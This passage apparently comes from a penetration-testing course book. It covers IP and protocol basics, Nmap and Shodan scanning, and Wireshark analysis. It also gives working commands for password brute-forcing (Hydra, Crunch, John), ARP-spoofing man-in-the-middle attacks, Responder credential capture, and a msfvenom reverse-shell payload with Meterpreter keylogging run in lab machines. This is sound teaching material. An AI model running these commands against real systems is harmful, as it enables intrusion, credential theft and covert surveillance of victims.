This is the 4th version of Internet Protocol. An IPv4 address comprises 32 binary digits and is
represented by four decimal numbers separated by a dot (.); each of these numbers is a group of 8
binary digits. Their size is anywhere between 0-255.
IPv6
This is the 6th version of the Internet Protocol. An IPv6 address is built from 128 bits: the first 64 bits
(left) are used to ID the subnetwork, while the last 64 bits (right) are used as interface ID. Interface ID
is set by the MAC address of the network adapter (NIC).
Subnet Mask
This value divides the IP address into the network (255) and computer (0). It is a number to determine
the IP address.
P a g e | 69
Bit
The primary digital unit of information (unit of data) in digital devices is a bit; a bit can be 0 or 1.
Byte
Kilobyte
Megabyte
Gigabyte
Terabyte
Unit of digital information comprised of 8 bits
Unit of digital information equal to 1,024 bytes
Comprised of 1,024 kilobytes
Comprised of 1,024 megabytes
Comprised of 1,024 gigabytes
Remote Connection Protocols
SSH: It is a cryptographic network protocol. It provides a secure communication channel over an
unsecured network to operate network services. For example, it can log into a remote machine and
execute remote commands. Any app can use SSH to secure the connection between the client and the
server. SSH uses Public-Key cryptography, which uses a pair of keys. One key is public, and the other
one is private. To decrypt the data, both keys are required. SSH was designed to replace the unsecured
Telnet protocol.
RDP: Remote desktop protocol is used for network administrators to connect remotely to other
devices for troubleshooting. RDP is by default on port 3389 and requires configuration by the endpoint
user before it can be used for security reasons.
FTP: File Transfer Protocol is a way to share files across computers on the same network. FTP is a
client-server. The client is requesting the files, and the server provides them.
Telnet: this protocol is the same as SSH but not secured. It provides a command-line interface on a
remote host. Telnet is not secure because the data transferred between the two hosts is not
encrypted, and anyone on the same network can intercept the traffic and read the data. There is no
authentication for the hosts, so they could be certain no one is listening to the traffic.
IPv4
IPv4 address comprises 32 bits and is divided into four Octets separated by a stop (.). Each octet
contains a number (0-255), a group of eight bits.
0-255.0-255.0-255.0-255
External IP
Used to connect to the internet.
Internal IP
Organizations and home networks use them.
10.0.0.0 - 10.255.255.255
172.16.0.0 - 172.31.255.255
192.168.0.0 - 192.168.255.255
70 | P a g e
Internal IP
Personal IP for each computer, 127.0.0.0-127.255.255.255, the most known and used is 127.0.0.1.
Primary IP
Network name, for example, 10.0.0.0.
Last IP
They are used for broadcasting general message to all computers in the network. For example, on
10.0.0.255, a message sent to this address be sent to all network computers.
Subnet Mask
Normal display: 255.255.255.0
Binary display: 11111111.11111111.11111111.00000000
CIDR display: /24
Classes
IP is divided into classes; each class has its subnet mask. Today, we don't need to use these classes
with the specific subnet mask, but it's essential to know them.
Class A: 1.0.0.0 - 126.255.255.255
255.0.0.0 - /8
Class B: 128.0.0.0 - 191.255.255.255
255.255.0.0 - /16
Class C: 192.0.0.0 - 223.255.255.255
255.255.255.0 - /24
P a g e | 71
Protocols and Services
In general, network protocols specify how, when, and why different internet devices should
communicate with each other. Think about it like traffic rules; if there were no rules, everyone driving
on the road would be in chaos and not know what to do. The protocols set standards and policies for
network traffic so that everything remains in order, and each device knows what to do with the data
it receives. On the other hand, network services are applications running on the network to provide
services to clients, such as email apps, the world wide web, printing servers & video on demand
websites.
DNS
Domain Name System serves as the phonebook of the internet. It resolves domain names, which
humans use to access websites, IP addresses, and computers to locate data across the vast network.
Each device connected to the internet receives an IP address that computers use to find the domain
name. Without the DNS ability to translate domains to IP, we had to remember 187.148.52.44 to
access the favorite website instead of doglovers.com. Four different DNS servers go into action when
a page is loaded.
•
•
•
•
DNS recursor: the recursor is a server designed to receive queries from clients via applications
like web browsers. Then make additional requests to fulfill the client machine requests.
Root nameserver: is the first step in translating human requests. It sends the request to a
more specific server for further analysis.
TLD nameserver: this is the middle station in the DNS translation request path. This server
holds the last portion of the domain name. If the website is www.news.com, the TLD
nameserver keeps the ".com" part.
Authoritative nameserver: this is the last server. The hostname requested by the client
machine be translated into the IP address and sent back to the DNS recursor.
DNS Zone
The DNS zone is a DNS server or servers managed by a specific organization for delegating control.
DNS zone is a database with all the IP addresses and hostnames that the organization owns.
DHCP
Dynamic Host Configuration Protocol is a network management protocol. Its primary goal is to assign
unique IP addresses to each device connected to the internet, the default gateway, and the DNS
address. For example, a big organization that has 50 computers. Instead of assigning an IP address,
gateway, and DNS server to each one, the DHCP does it automatically for us. Each computer has a
DHCP client, and once that computer connects to the ethernet, the client sends a request to the DHCP
server to request an IP address. The DHCP server responds and provides the 3 IPs we mentioned
before. The DHCP is not on a dedicated server in home and small business environments but the router
itself.
72 | P a g e
ARP
Address resolution protocol is a communication protocol for resolving IP addresses to MAC addresses.
IP addresses are required to locate another computer on the network. The physical address is required
to determine the device and connect with it. Each computer first looks at the local ARP cache for a
matching MAC address of the destination IP. If it's not there, the source host sends a broadcast
message over the network asking who has the destination's specific IP address, and the destination
host responds with his MAC address. Once that happens, the source and destination hosts keep the
IP & MAC addresses in their local ARP cache so that they need to communicate the next time; the
process flow be much smoother.
Important Protocols
HTTP/S: the worldwide web uses hyperText Transfer Protocol. It specifies how HTTP status codes
should be formatted and transmitted. And how servers and browsers respond to these codes. The
traffic between the browser and the webserver is not encrypted. HTTPS is the same except that the
communication is encrypted.
The common status codes for HTTP/S are:
200 - OK
404 - Not Found
403 - Forbidden
511 - Authentication required
500 - Server error
Promiscuous mode
Promiscuous mode causes the controller to pass all traffic it receives to the central processing unit
(CPU) rather than giving the controller's frames programmed to receive.
P a g e | 73
Introduction to Scanning
Network scanning is a procedure for identifying active devices on a network by employing features or
features in the network protocol to signal devices and wait for a response. Most network scanning is
used in monitoring and management, but scanning can identify network elements or users for attacks.
The specific protocol features used in scanning depend on the network. However, scanning sends a
simple message (ping) to each possible IP address in a specified range for IP networks. It then uses
another protocol to obtain data on the devices if a response to the ping is received.
When we choose a site or network to scan, we first need to gather intel and know every piece of
information that can help us. The information-gathering stage is the first step in any attack. There are
two ways to collect data: passive and active. Passive scanning identifies weaknesses in systems that
rely on information collected from the network on the target without direct interaction with the
computer or the target network. For example, Google searches articles about the company, its
employees, and more. The great advantage of passive scanning is that it does not leave traces, and
rarely the target knows that we scanned it and obtained information for future use. The disadvantage
of this scan is that it’s limited in terms of information.
Performing an active scan is crucial. This scan collects information about the target, but we are in
complete communication, unlike a passive scan. For example, we expose information on a computer
such as open ports, operating systems, antivirus, and more. This scan usually leaves traces and is
recognizable, so maximum care is required when performing it. This scan's advantage is the amount
of information we receive on the target, which helps map the goal's network and defenses.
Scanning with Nmap
An active scan tool, among the best. Nmap has many types of scans and several ways to avoid
detection. Types of scans: Scanning for open ports and their versions, finding an operating system,
running Nmap scripts (NSE), checking available IP addresses (ping scanning), and more.
Useful flags
--open
-p
-F
-A
-sC
--script
--script-args
-sV
-Pn
-sS
-sP
-sn
-iL
-sU
-O
-D
-P0
-oN
-T2
Show computers with open ports.
Scans for ports
Fast scan, scan 100 ports, compared to average 1000 ports.
Preform an aggressive scan using the '-O '-sV' '-sC' and '-Traceroute'.
Automatically uses NSE scripts.
Manually selecting an NSE script.
Set script arguments.
Banner Grabbing, searching for the software version of ports.
Treats all computers as "on" (can pass firewall).
Stealth, silent scan, avoiding detection - recommended for use.
Scan for identifying hosts on the network.
Ping scan.
File with IP address.
UDP scan.
Operating System recognition.
Decoy, enabling camouflaging an IP with a different IP.
Avoids firewall protection for the ping.
Saves the output into a file.
Silent scan, more extended, but with fewer chances of getting blocked by security.
74 | P a g e
Basic Scans
The default scan scans for the 1,000 most common ports.
Scan specific port(s)
root@kali:~# nmap -p <Port/s> <Target>
Adding a flag --open filters the computers with the closed ports and displays the open ports' machines.
Finding the version of the service
root@kali:~# nmap -sV <Target>
Computer scan for finding open UDP ports
root@kali:~# nmap -sU <Target>
Saving output to a file
Using the operator “>”:
Using the flag “-oN”:
nmap 192.168.1.1 > fileName.txt
nmap 192.168.1.1 -oN TextFile.txt
Scanning for a range of IP addresses
By range:
nmap 192.168.1-3.1-255
By Subnet Mask:
nmap 192.168.1.1/24
By file:
nmap -iL IPS.txt
P a g e | 75
Scanning with Shodan
Shodan is a web crawl that scans the entire internet for devices connected to the internet at least
once a month and stores the gathered information in a database.
https://www.shodan.io/
With Shodan, filter targets by text, title, domain, port, city, network, geography, operating system,
etc. For example, to search for any machine that runs an FTP service, type service:ftp
76 | P a g e
The result page is divided into statistics to filter the results further and the results themselves. Find
the number of open FTP services in each country.
The 'free' searching is restricted. Therefore, we cannot search for a target by the state without
registering for the site. The registering process is free.
P a g e | 77
Shodan automatically attempts to log in to the scanned services using the anonymous account and
default credentials.
General Information about the target
Web-Technologies (exists if the host has web capabilities)
78 | P a g e
Possible Vulnerabilities
Open ports
In-depth service information
P a g e | 79
Brute-Force
A brute-force attack is when the attacking computer tries every possible combination of characters
until it detects/identifies the correct combination. Theoretically, an attack of this kind can break any
password and is carried out mainly as a last resort when there is no faster way to gain access to the
target or when it is known to be short passwords or a very specific structure.
To perform such an attack, produce a wordlist, a list of passwords can be used on the target machine.
The first place to look for a password list is Google. With Google, check which passwords are most
common globally, passwords likely to be encountered in places with relatively low security. To add
more suitable passwords for the chosen purpose, use Cupp and Cewl.
CeWL
Generate a password list explicitly built for the victim; this would shorten the process by hours or days.
People are not so creative when it comes to choosing a password. Finding the correct password can
be much faster. For example, a construction company employee is more likely to use words related to
their work, such as build, soffit, grinder, hammer, etc. Economists are likely to use words like cash,
financial, economy, etc. It is human nature to choose a password from everyday experiences.
Therefore, many people use children, uncles, animals, birth dates, streets, and more. We use this
knowledge to build a list of passwords suitable for a company or employment area. This is the role of
CeWL; it is designed to collect words from the company site and create a list that is especially suitable
for employees.
cewl -w niwlist.txt -d 3 -m 5 <target_related_info>
-w
-d
-m
Name of the file where the passwords are kept.
Depth of the scan the tool performs on the site.
Minimal length of a word. There's no need to add a short word to the list since there is a
minimum length to a password on most sites.
root@kali:~# cewl -w newList.txt -d 3 -m 5 www.sans.org
For the help screen:
root@kali:~# cewl --help
80 | P a g e
Crunch
Another tool for creating passwords is Crunch, which can create customizable passwords.
root@kali:~# crunch
For example, to create a five characters password, letters.
root@kali:~# crunch 5 5 abcdefghijklmnopqrstuvwxyz -o /root/Desktop/file.txt
The tool creates a file containing 11,881,376 passwords, all the possible permutations in English with
a length of 5 characters.
With Crunch, we create patterns as well.
@
= Lowercase letter.
,
= Uppercase letter.
%
= Number/Digit.
^
= Special characters ($%#@!)
Additionally, if we use the flag -t, we create a unique pattern.
root@kali:~# crunch 6 6 abcdefghijklmnopqrstuvwxyz -t John@@
This command creates all the passwords possible with six characters, starting with john and combining
the characters we set up. Combine all passwords into one file, ready for the task at hand. The next
stage is Brute force, using the file we created to attack the target servers.
P a g e | 81
Offline Brute Force: Shadow file
Open the user's shadow file as root or other higher privileges and choose the user you want to brute
force.
Copy the user's password hash into a separate file.
Use john the ripper tool to Bruteforce the password. By default, john uses a wordlist to crack the
password.
82 | P a g e
Cain or Cain & Abel
This software is relatively old but excellent. It has several tools; most noted is the use of offline brute
force. Many sites use the hashing function to keep users' passwords more secure. With this software,
we detect hash passwords. Download it from www.oxid.it/cain.html and install it.
Press on the Cracker tab and input the hash; it is added to the list.
P a g e | 83
Right-click hash and start an offline brute force attack.
84 | P a g e
Online Brute-Force: Hydra
Hydra is a popular tool for brute force.
root@kali:~# hydra -l UserName -P PasswordsFile -vV 10.0.0.15 ssh
-l
Username whom password crack.
-P
Password file we created.
- vV
Shows penetration tries.
The brute force attack was successful.
P a g e | 85
Osueta
This tool lets us know if a user, or a list of users, exists in an OpenSSH server. To use the tool, download
it from GitHub.
git clone https://github.com/c0r3dump3d/osueta.git
root@kali:~# python osueta.py -H <HostIP> -U <UserNameToTry> -p 22
The software performs ten attempts with random users to evaluate a normal connection time and
then search for the user set up.
Oclhashcata
Oclhashcata is another tool to crack local passwords.
root@kali:~# apt-get install oclhashcat
root@kali:~# oclhashcat -m 500 hashExample /root/Desktop/WordList.txt -o Found.txt
-m
-o
Hash type
Saves passwords deciphered in a file
86 | P a g e
Practical Lab
Passwd
Changing the root password to '1' using the passwd command.
DNS
Fetching the DNS server used by Kali Linux, use the file located in /etc/resolv.con; nameserver
represents the DNS server.
ARP
Scanning for the ARP table in the Kali machine using the arp-scan command.
-l
used to scan for the local network.
Viewing the ARP table on the Windows machine using the arp command.
-a
used to display current ARP entries
Services
we check what services are operating in the Linux system using the service command, such as SSH,
FTP, Apache, and more.
service --status-all
check installed services on the local machine.
service ssh start
start the ssh service
service ssh stop
stop the ssh service
service ssh status
check the status of the ssh service
P a g e | 87
SSH
Installing SSH service on the Linux machine by using the apt install command.
After installing the SSH, start the service with the service command.
To check which ports are opened in the system by using the command netstat -tpan
88 | P a g e
We change the default port of the SSH service by editing /etc/ssh/sshd_config.
As shown in the image, remove the # before Port 22 in line 15 and change the 22 port to 2200. After
editing, restart the service.
P a g e | 89
FTP
Installing the FTP service using the command apt install vsftpd.
After finishing installing the FTP, start the FTP server.
90 | P a g e
Nmap
we use the NMAP command to search for open ports on the system. Nmap is a network mapper is a
command tool in Linux for network exploration and security auditing.
Nmap flags
-p
-A
-V
-v
-sn
-sV
-h
scan a specific port
OS detection, version detection, script scanning, and traceroutes
print version number
extend the verbose
scanning technique for TCP
determine service/version info
manual for nmap tool
P a g e | 91
Masscan
Check for RDP port 3389 using the masscan tool.
masscan --range 81.218.120.0-81.218.137.255 -p 3389
--range
IP address range
-p
choose a specific port to scan
Using the rdesktop command to try and connect to the found IP addresses.
92 | P a g e
Log Filtering
Checking for the failed connection attempt to the server by viewing the auth.log file located in
/var/log/auth.log. Using the grep command to filter and show the lines that contain the word "Failed".
Apache2
Starting the Apache2 server with the service command, And checking if the Apache2 service is up, use
the status command.
P a g e | 93
Module 5: Diving into Packets
Wireshark
Wireshark is an open-source tool for profiling network traffic and analyzing packets. Packet capture
can provide a network administrator with information about individual packages such as transmit
time, source, destination, protocol type, and header data. Open Wireshark and choose interface network card; capture the information (usually with most packets) with its help.
When we start the capture, all packages of information from the card to the network and back show
on the screen.
No
The number of packets from the start of the capture.
Time
Time passed from the initial capture.
Source
IP address, the source of the packet (sender).
Destination
Packet destination, IP address.
Protocol
The protocol is used to transfer the packet.
Length
Length of the packet, size in bytes.
Info
Details of the packet.
94 | P a g e
The most relevant columns for us are Source, Destination, Protocol, Info. Different protocols are
marked in different colors. We stop listening and resume it/start a new one using the three icons in
the toolbar. The blue left - the start of capture. Red Square - stop. Right, green with an arrow - cleaning
the screen and new capture.
In this box, use expressions to focus on individual packets and search for specific information or
packets, such as searching for connections to the computer, particular ports, information sent in a
form, etc.
Non-Secure and Secure Packets
The difference between secure and non-secure packets is data encryption. Intercept network traffic
and discover other hosts' credentials in the network; the packets are not secured. After a POST packet
is located, right-click on it, choose Follow → TCP Stream, and search for username and password.
P a g e | 95
We see the username and password in a raw text after clicking Follow TCP Stream. This is the sixth
layer, the presentation layer, of the OSI model we talked about earlier.
In an HTTPS website, the data be encrypted.
96 | P a g e
Filtering and Parsing
Filtering pcap files in Wireshark can help an analyst extract exactly the data he needs from the network
traffic.
To display packets from an IP address
ip.src == 192.168.221.128
To display packets sent to an IP address
ip.dst == 192.168.221.128
P a g e | 97
Display first filter and second filter (it is possible to use && parameter as “and”)
ip.src == 192.168.221.128 && ip.dst == 64.74.236.127
Show packets from a specific port
tcp.port == 80
98 | P a g e
Packets sent using POST method, such as username and password (http not https)
http.request.method=="POST" (or “GET”)
P a g e | 99
Another feature to look for is the statistics tab. There are many options to filter the output precisely
the way you need it, for example, endpoint statistics.
100 | P a g e
Extracting Objects
Extracts all the files transferred in that part of captured network traffic with the export objects option.
File→export objects→HTTP
Then we get this screen - that allows us to save all the files to the computer for further analysis.
P a g e | 101
Practical Lab
Host
To get the domain's IP address (DNS), use the Linux machine's host command.
The arp-scan command gives us the ability to search the local network ARP table.
Wireshark
To sniff network activity on the machine, use the Wireshark tool to capture the network activity. Use
the filter arp to see ARP packets.
102 | P a g e
Other filters, such as DNS and DHCP, to view relevant packets.
P a g e | 103
Packets
Analyzing a packet in a given pcap file, we have an attempt to create a TCP connection (SYN) between
192.168.221.128 and 185.60.216.19.
SYN
104 | P a g e
In the Ethernet layer, we get information about the devices that interact with each other.
In the image, the VMware_eb device tried to connect and establish a TCP connection with the
VMware_08 device.
P a g e | 105
To find the MAC vendor, search Google for MAC address lookup Online.
The vendor, in this case, is Hewlett Packard, also known as HP. To view the endpoints in the pcap file,
navigate to statistics -> endpoints.
106 | P a g e
We have 66 different IPv4 in the pcap file. Investigate the files transferred in the HTTP protocol and
navigate to file -> export objects -> HTTP.
P a g e | 107
Module 6: Windows Network Tools
OS Fingerprinting
Determining what OS, a machine, or device is running can be helpful for many reasons. The easiest
way of doing OS Fingerprinting is by looking at the TCP Window Size and Time to Live (TTL) in the first
packet's IP header in a TCP session. At first, determine the machine's IP that captured the pcap file's
traffic.
The first one is the NBNS protocol query.
We see that the IP of the requesting machine is 172.16.2.169.
The same IP address, 192.168.221.128, sent an external IP a “GET” request. Based on both protocols,
we conclude that the IP address is 192.168.221.128. Look at the values for the more popular operating
systems.
108 | P a g e
The first method is the TTL method; filter any packet with a source of 172.16.2.16 containing TTL data.
To do so, use the filter ip.src==192.168.221.128 && ip.ttl
Here, the TTL is 64, which indicates that the machine is either Linux (Kernel 2.4 and 2.6), Google Linux,
FreeBSD; to eliminate one of the options, we must test the Window Size method.
To filter Window Size data, use the same base filter as before to filtertheIP and the Window Size data:
ip.src==172.16.2.169 && tcp.window_size
P a g e | 109
Detecting Suspicious Traffic
To identify and catch malicious traffic by narrowing down all the suspicious packets, use a simple pcap
file recorded on a home computer. Look at the TCP ports in Wireshark by going to Statistics >
Endpoints.
And then choose the TCP option.
110 | P a g e
We received a list of all IP addresses and ports.
To see that the IP address 192.168.221.128 is connected to the machine using the source port of 4444,
which is known to be the default port of reverse_tcp type of trojans in the msfvenom program. This is
an example of how simple filtering and statistic can help us find malicious and unwanted traffic on the
network.
Sanitizing Pcap Files
When capturing network traffic, sometimes the capture program catches irrelevant packets, and
therefore they need to be removed from the pcap file when saved for future research. To do so, go
through a simple process of sanitizing the pcap file.
P a g e | 111
There are a lot of protocols in the network file.
To apply any sub-protocol related to the NetBIOS protocol by clicking:
Right-click on NetBIOS → Apply as Filter → Selected
Looking at the bottom right corner, 1924 packets of the 57998 packets are displayed in the pcap file.
112 | P a g e
To export a specific packet into a pcap file, click File → Export Specified Packets
By default, this menu is set to export displayed packets.
Save the pcap file for receiving the sanitized pcap file.
P a g e | 113
Module 7: Local Network Attacks
MiTM
The Man-in-the-Middle attack implies an active attack where the adversary impersonates the user by
creating a connection between the victims and sending messages between them. In this case, the
victims think they are communicating, but the attacker controls communication.
The requirements for this demonstration are:
•
•
•
Enabling routing on the attacker machine (Linux)
The local network interface name of the attacker
The IP addresses of both victims, usually victim and router.
1) Enable routing (packet forwarding) in Linux:
In this way, the machine act as a router. Execute the command in a new terminal.
2) Intercept packages from the victim with arpspoof:
arpspoof in a command-line utility that allows intercepting packets on a switched LAN.
It redirects to packets from a target host (or all hosts) on the LAN intended for another host
by forging ARP replies.
The syntax for arp spoofing is:
ARPSPOOF -I [NETWORK INTERFACE NAME] -T [VICTIM IP] [ROUTER IP]
First Terminal.
114 | P a g e
3) Intercept packets from the router with arpspoof:
You're intercepting packets from the victim to the router. In the terminal, you need to
intercept the packets from the victim to the router with arpspoof.
The structure of the command to start intercepting packets from the router to the victim:
ARPSPOOF -I [NETWORK INTERFACE NAME] -T [ROUTER IP] [VICTIM IP]
Second Terminal.
Sniff images from victim's navigation using driftnet.
Check the other machines (Windows 10) ARP table to prove that everything works fine.
Notice the duplicated MAC address.
P a g e | 115
LLMNR Attacks
Starting the responder tool.
The user in the Windows 10 machine is accessing his shared folder and making a typing mistake.
116 | P a g e
The request fails, and the listener (Responder on Kali) catches the NTLMv2 hash. That works because
the Windows machine is logged into a request for a file share location. No other server knew the
location of the share, so we said we knew where it was. The Windows machine then sent
authentication, and we captured that response.
The logs are stored under this path: /usr/share/responder/logs.
The responder tool can do much more stuff than basic LLMNR poisonings like WPAD poisoning and
others. To crack the hash, use the John the Ripper.
P a g e | 117
Practical Lab
This gives us the ability to sniff the victim's entire network activity because the attacker passes all the
traffic to the victim's router. That's why it is called Man In The Middle.
But to use the command, install dsniff.
Dsniff
Before choosing a target and initiating an attack, make Kali Linux forward IP by modifying the
ip_forward file content from 0 to 1.
Use the command in the Terminal to allow routing on the attacker machine:
echo 1 > /proc/sys/net/ipv4/ip_forward
118 | P a g e
Getting the correct interface to work with arpspoof with the ifconfig command.
Scanning for victims in the local network using the arp-scan command. Choose the Windows7 machine
with the IP of 192.168.1.220.
To verify the IP address in the local Windows10 machine with ipconfig.
192.168.221.157
P a g e | 119
Now, start the attack in two terminals with the commands:
arpspoof -t <RouterIP> <TargetIP>
arpspoof -t <TargetIP> <RouterIP>
arpspoof -t 192.168.221.2 192.168.221.157
arpspoof -t 192.168.221.157 192.168.221.2
Capturing the victim network activity with Wireshark and seeing visited websites.
ip.addr==192.168.221.157 && http
After initiating the attack, check for MAC address duplication in the Windows machine with the arp a command. MAC duplication can point that a MiTM attack is accruing at the moment. The image
below shows that the Router MAC address and the 192.168.221.128 (attacker) have MAC addresses.
120 | P a g e
Responder
Using the responder command in the Kali Linux to capture credentials quickly. Responder is an LLMNR,
NBT-NS & MDNS poisoner that is easy to use and very effective against vulnerable networks.
-w
-b
-f
start WPAD server
Enable basic HTTP Authentication.
Forces Authentication for WPAD (a login prompt)
These flags give the Responder the ability to force users with a login screen when they try to surf the
web and grab the entered credentials in cleartext. Use the -I flag to specify the network interface,
scanning and poisoning the other network devices.
Gaining credentials once the Windows system is tricked into communicating with Responder or when
a user is trying to connect to an incorrect shared folder or server.
P a g e | 121
Capturing FTP logging attempts thru the web.
Log files for the responder are located in the /usr/share/responder/logs/ directory.
122 | P a g e
Now, use John to crack the hash.
P a g e | 123
Cyber Attack Practice
Backdooring
Hackers use backdoors to maintain a foothold in the victim's computer by hiding the backdoor
malware and making it persistent. When he needs to access the infected system, he can do it quickly.
That allows the hacker to get around security measures and gain root access. Most of the time,
backdoor software is a trojan. Backdoors first start with the trojan file, conceiving itself as legitimate
software. Once the user successfully tricked and executed the file, the hacker used the trojan as a
communication portal. A common way to make sure the portal never closes is by using Rootkit - a
highly sophisticated malware package that is very hard to detect. It makes sure the trojan file
existence. Its network traffic and any other aspect of its activity on the computer remain concealed
from you, the operating system, and any other defensive measure you have, like firewall, antivirus,
etc.
At the final stage, a fully operational backdoor used for several purposes:
•
•
•
•
Installing other types of malware
Remote code execution
Taking complete control of the computer
Exfiltrating sensitive data
Metasploit Framework
The Metasploit Framework is an open-source penetration testing and development platform that
exploits various applications, operating systems, and platforms. Metasploit is one of the most
commonly used penetration testing tools and comes built-in to Kali Linux. The main components of
the Metasploit Framework are called modules. Modules are standalone pieces of code or software
that provide the functionality to Metasploit. There are six modules: exploits, payloads, auxiliary, nops,
posts, and encoders; focus on exploits and payloads.
Exploit
An exploit takes advantage of a system's vulnerability and installs a payload.
Payload
The payload gives access to the system by various methods (reverse shell, meterpreter, etc.)
•
•
Bind TCP
Reverse TCP
The main difference is who connects to who.
Bind TCP - the attacker machine connects to the victim. Open up a port on the victim's device and
allow the attacker to connect to this device. Usually, a machine behind a firewall (or NAT) does
not have open ports other than a few specific ones (80, 443, 22, etc.).
124 | P a g e
Reverse TCP - the victim machine connects to the attacker. The attacking machine has an open
port that receives the incoming connection when command execution is issued. If it is remotely,
port forwarding should be done on the router.
•
•
•
Kali Linux (attacker)
Windows 7 (victim)
Make sure their Network Adapter is set to NAT to communicate with each other
Create the basic reverse payload, in the Kali Linux terminal by typing:
msfvenom -p windows/meterpreter/reverse_tcp lhost=<attacker_ip> lport=<listening_port> -f exe
-o rev.exe
Create a listener using the listener module inside Msfconsole.
Execute the commands to create a listener for incoming payload requests.
1.
2.
3.
4.
5.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <our IP>
set LPORT <port for listener (port:4444)>
exploit
P a g e | 125
Send the payload to the victim via the HTTP server and execute. There are many different ways to
send a payload, one of them is the SimpleHTTPServer module.
Opening the server: python -m SimpleHTTPServer 8000
Access from the Windows10 machine browser; inside the URL tab, type the Linux machine IP address
and the port we listen to (8080). Download the payload and execute to get control.
126 | P a g e
Once the victim executes the payload, the Msfconsole screen presents the Meterpreter shell, which
is unique and valuable with many options to use.
P a g e | 127
Practical Lab
Payloads
To configure the listener and set a payload, and exploit, type:
use exploit/multi/handler
set payload /windows/meterpreter/reverse_tcp
Using the options command, see the correct lhost and lport set with the listener. Set the correct lhost
and lport.
128 | P a g e
After setting the port and the host IP address, execute the run/exploit command. Use the help
command to get all the available commands.
To take a screenshot of the victim screen, use a screenshot.
The screenshot is saved in the given path.
P a g e | 129
Creating a Keylogger using the meterpreter command keyscan_start, start a keystroke sniffer. To
dump the keystrokes, use keyscan_dump.
keyscan_stop to stop the keystroke sniffer.